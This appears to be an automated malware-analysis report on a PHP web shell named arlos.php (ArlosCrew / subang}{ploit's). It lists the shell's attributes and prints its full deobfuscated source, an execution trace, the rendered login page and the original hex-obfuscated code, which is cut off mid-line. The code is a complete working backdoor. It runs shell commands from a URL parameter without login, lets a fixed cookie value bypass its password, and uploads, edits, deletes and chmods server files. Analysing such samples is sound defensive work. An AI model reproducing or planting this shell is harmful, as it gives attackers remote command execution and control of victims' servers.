PHP Malware Analysis
arlos.php
md5: 9481576bd3b67a184e5b3e5bcdade39b
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- error_reporting (Deobfuscated, Original, Traces)
- getcwd (Deobfuscated, Original)
- set_time_limit (Deobfuscated, Original, Traces)
Execution
- system (Deobfuscated, Original)
Files
- copy (Deobfuscated, Original)
- file_get_contents (Deobfuscated, Original)
- file_put_contents (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
URLs
- https://fonts.googleapis.com/css?family=Iceland:400,700 (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<?php
@error_reporting(0);
@set_time_limit(0);
@clearstatcache();
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
$auth_pass = "07a046c046d6fd64c569ea48206e8bec";
function lp()
{
?>
<html><head><title>ArlosCrew</title><link href="https://fonts.googleapis.com/css?family=Iceland:400,700"rel="stylesheet"type="text/css"></head><body bgcolor="black"style="color:#fff"><center><br><h1><center><font face="Iceland"size="20">Adit<font color="red">X</font>ploiter<font color="red">'</font>s</font></center></h1><br><div><form action><input type="hidden"name="action"value="login"> <input type="password"name="pass"placeholder=" password"style="border-radius:10px"> <input type="submit"style="font-family:Iceland;margin-top:1px;width:70px;background:#000;color:red;border:2px solid #1abc9c;border-radius:10px"value="LogIn"></form><br></div><?php
echo system($_GET["cmd"]);
?>
</center><?php
}
if (isset($_GET["action"])) {
if ($_GET["action"] == "login") {
setcookie("password", $_GET["pass"]);
echo "<script>location='" . $_SERVER["PHP_SELF"] . "'</script>";
} else {
if ($_GET["action"] == "logout") {
setcookie("password", '', -31104000);
echo "<script>location='" . $_SERVER["PHP_SELF"] . "'</script>";
}
}
}
if (isset($_COOKIE["password"])) {
if (md5($_COOKIE["password"]) == $auth_pass || $_COOKIE["L"] == "L") {
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
function perms($file)
{
$perms = @fileperms($file);
if (($perms & 49152) == 49152) {
$info = "s";
} elseif (($perms & 40960) == 40960) {
$info = "l";
} elseif (($perms & 32768) == 32768) {
$info = "-";
} elseif (($perms & 24576) == 24576) {
$info = "b";
} elseif (($perms & 16384) == 16384) {
$info = "d";
} elseif (($perms & 8192) == 8192) {
$info = "c";
} elseif (($perms & 4096) == 4096) {
$info = "p";
} else {
$info = "u";
}
$info .= $perms & 256 ? "r" : "-";
$info .= $perms & 128 ? "w" : "-";
$info .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-");
$info .= $perms & 32 ? "r" : "-";
$info .= $perms & 16 ? "w" : "-";
$info .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-");
$info .= $perms & 4 ? "r" : "-";
$info .= $perms & 2 ? "w" : "-";
$info .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-");
return $info;
}
echo "\n<!DOCTYPE HTML>\n<HTML>\n<HEAD>\n\t<link href=\"https://fonts.googleapis.com/css?family=Iceland:400,700\" rel=\"stylesheet\" type=\"text/css\">\n<title>Mini Shell</title>\n<style>\nbody{\nfont-family: \"Iceland\", cursive;\nbackground-color: black;\ncolor:white;\n}\n#content tr:hover{\nbackground-color: #006c96;\ntext-shadow:0px 0px 10px #fff;\n}\n#content .first{\nbackground-color: #006c96;\n}\ntable{\nborder: 1px #f70c0c dotted;\n}\na{\ncolor:white;\ntext-decoration: none;\n}\na:hover{\ncolor:red;\ntext-shadow:0px 0px 10px #ffffff;\n}\ninput,select,textarea{\nborder: 2px #006c96 solid;\n-moz-border-radius: 5px;\n-webkit-border-radius:5px;\nborder-radius:5px;\n}\n</style>\n</HEAD>\n<BODY>\n\t";
?>
<h1><center><font size="20">subang<font color="red">}{</font>ploit<font color="red">'</font>s</font></center></h1><?php
echo "\n<table width=\"700\" border=\"1\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\n<tr><td>Current Path : ";
if (isset($_GET["path"])) {
$path = $_GET["path"];
} else {
$path = getcwd();
}
$pathen = $path;
$path = str_replace("\\", "/", $path);
$paths = explode("/", $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo "<a href=\"?path=\"/\"\">/</a>";
continue;
}
if ($pat == '') {
continue;
}
echo "<a href=\"?path=";
$linkpath = '';
for ($i = 0; $i <= $id; $i++) {
$linkpath .= "{$paths[$i]}";
if ($i != $id) {
$linkpath .= "/";
}
}
echo $linkpath;
echo "\">" . $pat . "</a>/";
}
echo "<font color=red> [</font>";
if (is_writable("{$path}/{$dir}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$dir}");
echo "<font color=red>]</font>";
echo "</td></tr><tr><td>";
if (isset($_FILES["file"])) {
if (copy($_FILES["file"]["tmp_name"], $path . "/" . $_FILES["file"]["name"])) {
echo "<font color=\"green\">Upload Success</font><br />";
} else {
echo "<font color=\"red\">Upload Failed</font><br />";
}
}
echo "<form enctype=\"multipart/form-data\" method=\"POST\">\nFile Manager : <font color=\"cyan\"><input type=\"file\" name=\"file\" /></font>\n<input type=\"submit\" value=\"Upload\" />-----------------------------------------------------------------<a href=\"?\"><font color=\"green\"> Home</font></a>\n</form></table>";
echo "<table width=\"600\" border=\"1\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"></tr></td>";
echo "<tr><td>\n ---------------------------------------------<font color=red>[</font><a href=\"?x=changepass\">Ubah Pass</a><font color=red>]</font>-----------<font color=red>[</font><a href=\"?action=logout\">LogOut</a><font color=red>]</font>---------------------------------------------\n</td></tr></table>";
if (isset($_GET["filesrc"])) {
echo "<br><center>File ---> ";
echo $_GET["filesrc"];
echo "</center><br>";
echo "<center><textarea cols=80 rows=20 name=\"src\">" . htmlspecialchars(file_get_contents($_GET["filesrc"])) . "</textarea><center>";
} elseif (isset($_GET["option"]) && $_POST["opt"] != "delet") {
echo "</table><br /><center>" . $_POST["path"] . "<br /><br />";
if ($_POST["opt"] == "chmod") {
if (isset($_POST["perm"])) {
if (chmod($_POST["path"], $_POST["perm"])) {
echo "<font color=\"green\">Success Change Permission</font><br />";
} else {
echo "<font color=\"red\">Failed Change Permission</font><br />";
}
}
echo "<form method=\"POST\">\n Permission : <input name=\"perm\" type=\"text\" size=\"4\" value=\"" . substr(sprintf("%o", fileperms($_POST["path"])), -4) . "\" />\n <input type=\"hidden\" name=\"path\" value=\"" . $_POST["path"] . "\">\n <input type=\"hidden\" name=\"opt\" value=\"chmod\">\n <input type=\"submit\" value=\"Go\" />\n </form>";
} elseif ($_POST["opt"] == "rename") {
if (isset($_POST["newname"])) {
if (rename($_POST["path"], $path . "/" . $_POST["newname"])) {
echo "<font color=\"green\">Success</font><br />";
} else {
echo "<font color=\"red\">Failed</font><br />";
}
$_POST["name"] = $_POST["newname"];
}
echo "<form method=\"POST\">\n New Name : <input name=\"newname\" type=\"text\" size=\"20\" value=\"" . $_POST["name"] . "\" />\n <input type=\"hidden\" name=\"path\" value=\"" . $_POST["path"] . "\">\n <input type=\"hidden\" name=\"opt\" value=\"rename\">\n <input type=\"submit\" value=\"Go\" />\n </form>";
} elseif ($_POST["opt"] == "edit") {
if (isset($_POST["src"])) {
$fp = fopen($_POST["path"], "w");
if (fwrite($fp, $_POST["src"])) {
echo "<font color=\"green\">Success</font><br />";
} else {
echo "<font color=\"red\">Failed</font><br />";
}
fclose($fp);
}
echo "<form method=\"POST\">\n <textarea cols=80 rows=20 name=\"src\">" . htmlspecialchars(file_get_contents($_POST["path"])) . "</textarea><br />\n <input type=\"hidden\" name=\"path\" value=\"" . $_POST["path"] . "\">\n <input type=\"hidden\" name=\"opt\" value=\"edit\">\n <input type=\"submit\" value=\"Go\" />\n </form>";
}
echo "</center>";
} else {
echo "<br /><center>";
if (isset($_GET["option"]) && $_POST["opt"] == "delet") {
if ($_POST["type"] == "dir") {
if (rmdir($_POST["path"])) {
echo "<font color=\"green\">Success</font><br />";
} else {
echo "<font color=\"red\">Failed</font><br />";
}
} elseif ($_POST["type"] == "file") {
if (unlink($_POST["path"])) {
echo "<font color=\"green\">Success</font><br />";
} else {
echo "<font color=\"red\">Failed</font><br />";
}
}
}
echo "</center>";
if (!isset($_GET["x"])) {
$scandir = scandir($path);
echo "<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\n <tr class=\"first\">\n <td><center><font color=\"red\">Dir</font></center></td>\n <td><center><font color=\"red\">Size</font></center></td>\n <td><center><font color=\"red\">Permissions</font></center></td>\n <td><center><font color=\"red\">Setting</font></center></td>\n </tr>";
foreach ($scandir as $dir) {
if (!is_dir("{$path}/{$dir}") || $dir == "." || $dir == "..") {
continue;
}
$dirlink = "{$path}/{$dir}";
echo "<tr>\n <td><a href=\"?path={$dirlink}\">{$dir}</a></td>\n <td><center>--</center></td>\n <td><center>";
if (is_writable("{$path}/{$dir}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo "</font>";
}
echo "</center></td>\n <td><center><form method=\"POST\" action=\"?option&path={$pathen}\">\n <select name=\"opt\">\n\t <option value=\"\">Select</option>\n <option value=\"delet\">Delete</option>\n <option value=\"chmod\">Chmod</option>\n <option value=\"rename\">Rename</option>\n </select>\n <input type=\"hidden\" name=\"type\" value=\"dir\">\n <input type=\"hidden\" name=\"name\" value=\"{$dir}\">\n <input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\n <input type=\"submit\" value=\">\" />\n </form></center></td>\n </tr>";
}
echo "<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>";
foreach ($scandir as $file) {
if (!is_file("{$path}/{$file}")) {
continue;
}
$size = filesize("{$path}/{$file}") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . " MB";
} else {
$size .= " KB";
}
$filelink = "{$path}/{$file}";
echo "<tr>\n <td><a href=\"?filesrc={$filelink}&path={$pathen}\">{$file}</a></td>\n <td><center>" . $size . "</center></td>\n <td><center>";
if (is_writable("{$path}/{$file}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$file}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo "</font>";
}
echo "</center></td>\n <td><center><form method=\"POST\" action=\"?option&path={$pathen}\">\n <select name=\"opt\">\n\t <option value=\"\">Select</option>\n <option value=\"delet\">Delete</option>\n <option value=\"chmod\">Chmod</option>\n <option value=\"rename\">Rename</option>\n <option value=\"edit\">Edite File</option>\n </select>\n <input type=\"hidden\" name=\"type\" value=\"file\">\n <input type=\"hidden\" name=\"name\" value=\"{$file}\">\n <input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\n <input type=\"submit\" value=\">\" />\n </form></center></td>\n </tr>";
}
echo "</table>\n </div>";
}
}
if (isset($_GET["x"]) && $_GET["x"] == "changepass") {
function fgc($file)
{
return file_get_contents($file);
}
function changepass($plain)
{
$newpass = md5($plain);
$newpass = "\$auth_pass = \"" . $newpass . "\";";
$con = fgc($_SERVER["SCRIPT_FILENAME"]);
$con = preg_replace("/\\\$auth_pass\\ *=\\ *[\"\\']*([a-fA-F0-9]*)[\"\\']*;/is", $newpass, $con);
return file_put_contents($_SERVER["SCRIPT_FILENAME"], $con);
}
echo "<center><h1>Change Shell Password</h1></center>";
echo "<center>";
echo "<form action=\"\" method=post ><table>";
echo "<tr><td>New Password</td><td> : <input type=password name=pass1 style=\"border-radius:5px;\" /></td></tr>";
echo "<tr><td>Confirm Password</td><td> : <input type=password name=pass2 style=\"border-radius:5px;\" /></td></tr>";
echo "<tr><td colspan=2><input type=submit value=submit name=L style=\"border-radius:5px;width:100%\"/></td></tr></table>";
echo "</form>";
if (isset($_POST["L"])) {
if ($_POST["pass1"] == $_POST["pass2"]) {
if (changepass($_POST["pass1"])) {
echo "<script>alert(\"password change successfully\")</script>";
} else {
echo "<script>alert(\"password change failed\")</script>";
}
} else {
echo "<script>alert(\"password not match\")</script>";
}
}
}
echo "\n</BODY>\n</HTML>";
} else {
lp();
}
} else {
echo lp();
}
?>
<center><br><font face="Iceland">copyright<font color="red">©</font>subang<font color="red">}{</font>ploit<font color="red">'</font>s</font><center></body></html>Execution traces
data/traces/9481576bd3b67a184e5b3e5bcdade39b_trace-1676244762.207.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:33:08.104815]
1 0 1 0.000197 393512
1 3 0 0.001092 485616 {main} 1 /var/www/html/uploads/arlos.php 0 0
2 4 0 0.001123 485616 error_reporting 0 /var/www/html/uploads/arlos.php 2 1 0
2 4 1 0.001146 485656
2 4 R 0
2 5 0 0.001165 485616 set_time_limit 0 /var/www/html/uploads/arlos.php 3 1 0
2 5 1 0.001188 485680
2 5 R FALSE
2 6 0 0.001207 485648 clearstatcache 0 /var/www/html/uploads/arlos.php 4 0
2 6 1 0.001223 485648
2 6 R NULL
2 7 0 0.001242 485648 ini_set 0 /var/www/html/uploads/arlos.php 5 2 'error_log' NULL
2 7 1 0.001263 485720
2 7 R ''
2 8 0 0.001281 485648 ini_set 0 /var/www/html/uploads/arlos.php 6 2 'log_errors' 0
2 8 1 0.001301 485720
2 8 R '1'
2 9 0 0.001318 485648 ini_set 0 /var/www/html/uploads/arlos.php 7 2 'max_execution_time' 0
2 9 1 0.001336 485688
2 9 R '0'
2 10 0 0.001353 485616 ini_set 0 /var/www/html/uploads/arlos.php 8 2 'output_buffering' 0
2 10 1 0.001372 485688
2 10 R FALSE
2 11 0 0.001391 485616 ini_set 0 /var/www/html/uploads/arlos.php 9 2 'display_errors' 0
2 11 1 0.001410 485688
2 11 R ''
1 A /var/www/html/uploads/arlos.php 10 $auth_pass = '07a046c046d6fd64c569ea48206e8bec'
2 12 0 0.001449 485616 lp 1 /var/www/html/uploads/arlos.php 14 0
3 13 0 0.001469 485616 system 0 /var/www/html/uploads/arlos.php 12 1 NULL
3 13 1 0.001493 485648
3 13 R FALSE
2 12 1 0.001512 485616
2 12 R NULL
1 3 1 0.001531 485616
0.001579 329888
TRACE END [2023-02-12 21:33:08.106240]
Generated HTML code
<html><head><title>ArlosCrew</title><link href="https://fonts.googleapis.com/css?family=Iceland:400,700" rel="stylesheet" type="text/css"></head><body bgcolor="black" style="color:#fff"><center><br><h1><center><font face="Iceland" size="20">Adit<font color="red">X</font>ploiter<font color="red">'</font>s</font></center></h1><br><div><form action=""><input type="hidden" name="action" value="login"> <input type="password" name="pass" placeholder=" password" style="border-radius:10px"> <input type="submit" style="font-family:Iceland;margin-top:1px;width:70px;background:#000;color:red;border:2px solid #1abc9c;border-radius:10px" value="LogIn"></form><br></div></center><center><br><font face="Iceland">copyright<font color="red">©</font>subang<font color="red">}{</font>ploit<font color="red">'</font>s</font><center></center></center></body></html>Original PHP code
<?php
@error_reporting(0);
@set_time_limit(0);
@clearstatcache();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$auth_pass = "07a046c046d6fd64c569ea48206e8bec";
goto R0enV; hJ8rW: if (isset($_GET["\141\x63\x74\151\x6f\156"])) { if ($_GET["\x61\143\x74\x69\x6f\156"] == "\x6c\x6f\147\x69\x6e") { setcookie("\160\x61\x73\x73\167\157\162\x64", $_GET["\160\x61\163\x73"]); echo "\74\x73\143\162\151\160\x74\76\x6c\157\x63\141\x74\x69\157\156\x3d\47" . $_SERVER["\x50\110\x50\137\123\x45\114\x46"] . "\x27\x3c\57\x73\143\x72\151\160\164\x3e"; } else { if ($_GET["\x61\x63\164\x69\157\x6e"] == "\154\157\x67\x6f\x75\164") { setcookie("\160\x61\x73\163\167\157\162\x64", '', -86400 * 30 * 12); echo "\x3c\x73\x63\x72\x69\160\164\x3e\x6c\x6f\143\141\164\151\157\156\x3d\47" . $_SERVER["\120\x48\x50\x5f\x53\x45\114\x46"] . "\x27\x3c\x2f\x73\x63\162\x69\160\164\x3e"; } } } goto WG8Zt; R0enV: function lp() { ?>
<html><head><title>ArlosCrew</title><link href="https://fonts.googleapis.com/css?family=Iceland:400,700"rel="stylesheet"type="text/css"></head><body bgcolor="black"style="color:#fff"><center><br><h1><center><font face="Iceland"size="20">Adit<font color="red">X</font>ploiter<font color="red">'</font>s</font></center></h1><br><div><form action><input type="hidden"name="action"value="login"> <input type="password"name="pass"placeholder=" password"style="border-radius:10px"> <input type="submit"style="font-family:Iceland;margin-top:1px;width:70px;background:#000;color:red;border:2px solid #1abc9c;border-radius:10px"value="LogIn"></form><br></div><?php echo system($_GET["\143\155\x64"]); ?>
</center><?php } goto hJ8rW; WG8Zt: if (isset($_COOKIE["\160\141\x73\163\167\x6f\x72\144"])) { if (md5($_COOKIE["\160\x61\x73\x73\x77\x6f\162\144"]) == $auth_pass || $_COOKIE["\x4c"] == "\114") { if (get_magic_quotes_gpc()) { foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } } function perms($file) { $perms = @fileperms($file); if (($perms & 49152) == 49152) { $info = "\163"; } elseif (($perms & 40960) == 40960) { $info = "\x6c"; } elseif (($perms & 32768) == 32768) { $info = "\x2d"; } elseif (($perms & 24576) == 24576) { $info = "\x62"; } elseif (($perms & 16384) == 16384) { $info = "\144"; } elseif (($perms & 8192) == 8192) { $info = "\x63"; } elseif (($perms & 4096) == 4096) { $info = "\x70"; } else { $info = "\165"; } $info .= $perms & 256 ? "\x72" : "\55"; $info .= $perms & 128 ? "\x77" : "\x2d"; $info .= $perms & 64 ? $perms & 2048 ? "\163" : "\x78" : ($perms & 2048 ? "\x53" : "\55"); $info .= $perms & 32 ? "\x72" : "\55"; $info .= $perms & 16 ? "\x77" : "\x2d"; $info .= $perms & 8 ? $perms & 1024 ? "\163" : "\170" : ($perms & 1024 ? "\123" : "\x2d"); $info .= $perms & 4 ? "\x72" : "\x2d"; $info .= $perms & 2 ? "\167" : "\55"; $info .= $perms & 1 ? $perms & 512 ? "\x74" : "\170" : ($perms & 512 ? "\x54" : "\x2d"); return $info; } echo "\xa\74\41\x44\x4f\x43\124\x59\x50\105\x20\x48\124\115\x4c\76\xa\74\x48\124\115\114\x3e\xa\74\110\105\x41\104\x3e\xa\11\x3c\154\151\x6e\153\x20\x68\x72\x65\146\75\x22\x68\x74\x74\x70\163\x3a\57\57\146\157\x6e\164\163\x2e\147\157\157\x67\154\x65\141\160\151\163\x2e\143\157\x6d\57\143\x73\x73\x3f\146\141\155\151\x6c\x79\x3d\111\143\145\x6c\141\x6e\x64\72\x34\x30\60\54\x37\x30\x30\42\40\162\145\x6c\x3d\x22\x73\x74\x79\154\145\x73\x68\x65\x65\164\x22\x20\x74\171\160\x65\x3d\x22\164\145\x78\x74\57\143\x73\x73\42\76\12\74\164\151\x74\x6c\145\x3e\x4d\151\156\151\40\x53\x68\145\154\x6c\74\x2f\x74\151\164\154\145\x3e\12\x3c\163\164\171\x6c\x65\76\xa\142\x6f\x64\171\x7b\xa\x66\157\x6e\x74\55\x66\141\155\x69\154\x79\72\x20\x22\x49\143\145\x6c\x61\x6e\144\42\x2c\40\143\x75\x72\163\151\x76\x65\73\xa\142\141\143\153\147\162\157\165\x6e\x64\x2d\x63\157\154\x6f\162\72\40\x62\x6c\141\143\x6b\x3b\12\x63\x6f\x6c\x6f\x72\72\167\150\x69\x74\145\73\12\x7d\xa\43\143\157\156\164\x65\156\x74\40\x74\x72\x3a\x68\x6f\166\x65\x72\173\12\x62\x61\143\x6b\x67\x72\x6f\165\156\x64\55\143\157\154\x6f\162\72\40\43\60\x30\66\143\71\66\x3b\xa\x74\x65\x78\164\55\163\x68\x61\144\157\x77\x3a\x30\160\x78\x20\x30\x70\170\40\61\60\x70\x78\40\43\146\146\x66\73\12\175\xa\x23\x63\157\x6e\x74\x65\156\164\40\56\146\x69\162\x73\164\173\xa\142\x61\x63\153\147\x72\157\165\156\x64\x2d\x63\157\x6c\157\x72\72\40\x23\x30\60\x36\143\71\x36\73\12\x7d\xa\164\141\142\154\x65\x7b\xa\142\x6f\x72\144\145\x72\x3a\40\61\160\x78\40\43\146\67\60\x63\x30\x63\40\144\157\x74\164\x65\x64\x3b\xa\175\xa\x61\173\12\x63\x6f\154\157\162\72\167\150\x69\x74\x65\73\12\x74\145\170\164\x2d\144\x65\x63\x6f\x72\141\x74\x69\157\156\72\x20\x6e\x6f\156\x65\73\12\x7d\xa\x61\x3a\150\157\166\145\162\x7b\xa\x63\157\154\157\x72\x3a\162\145\144\x3b\xa\164\145\x78\x74\55\x73\x68\x61\x64\x6f\167\72\60\x70\170\x20\60\160\x78\40\61\60\x70\170\40\x23\x66\x66\146\x66\146\146\73\12\175\12\x69\x6e\x70\x75\164\x2c\163\145\x6c\x65\x63\x74\x2c\x74\145\x78\x74\141\x72\145\x61\x7b\12\x62\x6f\162\x64\145\162\72\x20\62\160\x78\x20\43\60\60\x36\143\71\x36\40\163\x6f\154\x69\144\73\12\x2d\155\x6f\172\x2d\x62\x6f\x72\144\145\162\55\x72\141\144\x69\x75\x73\72\x20\x35\x70\x78\x3b\12\x2d\167\x65\x62\x6b\151\x74\x2d\142\157\x72\x64\x65\162\55\162\141\x64\151\x75\163\72\x35\160\170\73\12\142\x6f\162\x64\145\x72\55\x72\x61\x64\x69\165\163\x3a\65\160\x78\73\xa\175\xa\74\x2f\x73\164\x79\154\x65\x3e\xa\x3c\x2f\110\105\101\x44\76\12\x3c\102\117\104\131\x3e\xa\11"; ?>
<h1><center><font size="20">subang<font color="red">}{</font>ploit<font color="red">'</font>s</font></center></h1><?php echo "\xa\74\164\x61\142\x6c\x65\40\x77\x69\x64\x74\150\75\42\x37\60\60\x22\x20\142\x6f\162\x64\x65\162\x3d\x22\61\42\40\143\x65\154\x6c\160\x61\x64\x64\151\156\147\75\42\63\42\40\143\x65\154\154\x73\x70\x61\x63\151\156\x67\75\42\61\x22\40\x61\154\151\147\156\x3d\x22\x63\145\156\164\x65\x72\42\x3e\12\74\164\162\76\x3c\x74\x64\76\x43\x75\162\162\145\x6e\164\x20\x50\141\x74\150\x20\x3a\x20"; if (isset($_GET["\160\141\164\150"])) { $path = $_GET["\160\141\164\150"]; } else { $path = getcwd(); } $pathen = $path; $path = str_replace("\134", "\57", $path); $paths = explode("\x2f", $path); foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "\x3c\141\40\150\x72\x65\146\75\42\x3f\x70\x61\164\150\75\x22\57\42\42\x3e\x2f\74\x2f\x61\x3e"; continue; } if ($pat == '') { continue; } echo "\x3c\x61\x20\x68\162\145\x66\x3d\42\x3f\x70\141\164\150\x3d"; $linkpath = ''; for ($i = 0; $i <= $id; $i++) { $linkpath .= "{$paths[$i]}"; if ($i != $id) { $linkpath .= "\x2f"; } } echo $linkpath; echo "\x22\76" . $pat . "\x3c\57\x61\76\x2f"; } echo "\x3c\146\157\156\x74\x20\x63\157\154\x6f\x72\75\162\x65\144\76\40\40\40\x20\133\x3c\x2f\x66\157\x6e\x74\76"; if (is_writable("{$path}\57{$dir}")) { echo "\x3c\x66\157\x6e\164\40\x63\x6f\x6c\x6f\x72\x3d\42\x67\x72\145\145\156\42\x3e"; } elseif (!is_readable("{$path}\57{$dir}")) { echo "\x3c\x66\x6f\x6e\x74\x20\143\x6f\154\x6f\x72\x3d\x22\162\145\144\x22\76"; } echo perms("{$path}\x2f{$dir}"); echo "\74\146\x6f\x6e\164\x20\x63\157\x6c\157\162\75\x72\x65\144\76\x5d\x3c\x2f\146\x6f\x6e\x74\76"; echo "\74\x2f\164\x64\76\x3c\x2f\164\x72\x3e\x3c\164\x72\x3e\x3c\164\x64\76"; if (isset($_FILES["\146\151\154\x65"])) { if (copy($_FILES["\x66\151\x6c\145"]["\x74\x6d\160\x5f\x6e\x61\x6d\x65"], $path . "\57" . $_FILES["\x66\151\x6c\145"]["\x6e\141\x6d\145"])) { echo "\x3c\x66\x6f\x6e\164\40\x63\157\x6c\x6f\x72\x3d\42\147\162\x65\145\x6e\x22\76\x55\160\154\x6f\141\144\40\x53\x75\x63\143\145\x73\x73\x3c\x2f\146\157\156\164\x3e\x3c\142\162\x20\x2f\76"; } else { echo "\x3c\146\157\156\164\x20\143\157\x6c\x6f\x72\x3d\42\x72\x65\144\42\76\125\160\154\x6f\141\x64\x20\106\141\x69\x6c\145\144\74\57\146\x6f\x6e\164\76\x3c\142\162\x20\x2f\x3e"; } } echo "\74\x66\157\162\x6d\x20\x65\x6e\x63\164\171\x70\145\x3d\x22\155\165\154\164\x69\x70\x61\162\x74\57\x66\x6f\x72\x6d\55\x64\x61\164\x61\x22\40\155\x65\x74\150\157\144\75\x22\120\x4f\123\124\42\76\xa\106\151\x6c\x65\x20\x4d\x61\x6e\141\x67\x65\x72\x20\72\40\74\146\157\156\x74\40\143\x6f\x6c\x6f\x72\75\x22\143\x79\141\156\42\76\x3c\151\156\160\x75\164\40\164\171\x70\145\75\42\x66\x69\154\x65\42\x20\156\x61\155\145\x3d\x22\146\151\154\145\x22\40\x2f\x3e\74\57\x66\157\x6e\164\76\xa\74\151\x6e\160\165\164\40\164\171\x70\145\75\42\163\x75\142\155\151\164\42\40\x76\x61\154\x75\145\75\x22\x55\x70\x6c\157\141\x64\42\x20\57\76\x2d\55\x2d\55\55\55\55\x2d\55\x2d\55\x2d\x2d\x2d\x2d\55\55\x2d\55\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\55\55\55\x2d\x2d\55\55\55\x2d\55\55\x2d\x2d\x2d\x2d\55\55\x2d\55\x2d\55\55\x2d\55\55\55\x2d\55\x2d\55\x2d\55\x2d\x2d\x2d\55\x2d\55\x3c\141\x20\x68\x72\x65\x66\75\42\77\x22\76\74\x66\157\156\164\40\143\157\x6c\157\162\75\42\x67\162\x65\145\x6e\42\x3e\40\110\157\x6d\x65\74\x2f\146\157\156\x74\76\74\57\x61\x3e\xa\74\57\x66\x6f\162\x6d\x3e\x3c\57\164\141\x62\154\x65\76"; echo "\74\164\141\142\x6c\145\x20\x77\151\x64\x74\150\x3d\x22\x36\x30\60\42\x20\142\157\x72\x64\145\162\x3d\42\61\42\x20\x63\x65\154\x6c\160\141\144\144\151\156\x67\x3d\x22\x33\x22\40\x63\x65\x6c\x6c\163\160\141\x63\x69\x6e\147\75\42\61\42\40\x61\154\151\147\x6e\75\42\143\145\x6e\x74\145\162\x22\x3e\x3c\x2f\164\x72\x3e\74\57\x74\x64\76"; echo "\x3c\x74\162\x3e\74\x74\144\x3e\12\x20\40\55\55\x2d\55\x2d\x2d\x2d\x2d\55\x2d\x2d\x2d\55\55\55\x2d\55\55\55\x2d\55\x2d\x2d\x2d\55\55\55\x2d\55\55\55\x2d\x2d\55\55\55\55\x2d\55\x2d\x2d\55\55\55\x2d\74\146\157\156\x74\40\143\157\x6c\x6f\162\x3d\x72\x65\x64\x3e\x5b\x3c\57\x66\157\x6e\x74\x3e\x3c\x61\x20\x68\x72\145\x66\75\42\77\170\x3d\143\150\141\156\x67\x65\x70\x61\163\163\x22\76\125\142\141\x68\40\x50\x61\163\x73\74\x2f\141\x3e\74\x66\157\x6e\164\40\143\157\x6c\157\162\x3d\x72\145\144\76\135\74\57\x66\x6f\x6e\164\76\55\x2d\x2d\x2d\x2d\x2d\x2d\55\55\x2d\55\x3c\146\157\156\x74\40\x63\x6f\x6c\157\162\75\x72\145\144\x3e\133\x3c\x2f\146\x6f\156\x74\x3e\x3c\x61\40\x68\x72\x65\x66\x3d\x22\x3f\x61\143\x74\x69\157\x6e\x3d\154\157\x67\x6f\165\x74\x22\x3e\x4c\x6f\x67\117\165\164\74\x2f\x61\x3e\74\146\157\x6e\x74\40\143\x6f\x6c\157\x72\x3d\162\145\144\76\x5d\74\57\x66\157\156\x74\76\55\x2d\55\x2d\x2d\x2d\55\x2d\55\x2d\55\55\x2d\x2d\55\55\x2d\55\55\x2d\55\x2d\55\55\55\55\x2d\55\55\x2d\x2d\x2d\55\55\x2d\55\x2d\x2d\x2d\x2d\55\55\55\x2d\55\12\74\57\x74\x64\x3e\x3c\x2f\164\x72\76\x3c\57\164\x61\142\x6c\145\x3e"; if (isset($_GET["\146\x69\x6c\x65\163\162\143"])) { echo "\x3c\x62\x72\x3e\74\143\145\x6e\164\145\162\x3e\106\x69\154\145\x20\55\55\55\76\40"; echo $_GET["\x66\x69\154\145\x73\x72\x63"]; echo "\74\57\143\145\156\x74\x65\162\76\74\x62\x72\76"; echo "\74\143\x65\156\x74\145\x72\x3e\x3c\x74\x65\x78\x74\141\162\145\141\40\143\157\x6c\x73\75\x38\x30\x20\x72\x6f\167\163\75\62\60\x20\156\x61\x6d\x65\75\42\x73\162\143\42\76" . htmlspecialchars(file_get_contents($_GET["\x66\x69\x6c\x65\x73\162\x63"])) . "\74\57\x74\x65\x78\164\141\x72\x65\141\x3e\x3c\x63\x65\156\x74\145\x72\76"; } elseif (isset($_GET["\157\x70\x74\x69\157\x6e"]) && $_POST["\x6f\x70\164"] != "\144\x65\x6c\x65\x74") { echo "\74\57\x74\141\x62\154\x65\76\74\x62\x72\40\57\x3e\x3c\143\x65\156\164\145\162\x3e" . $_POST["\x70\x61\164\x68"] . 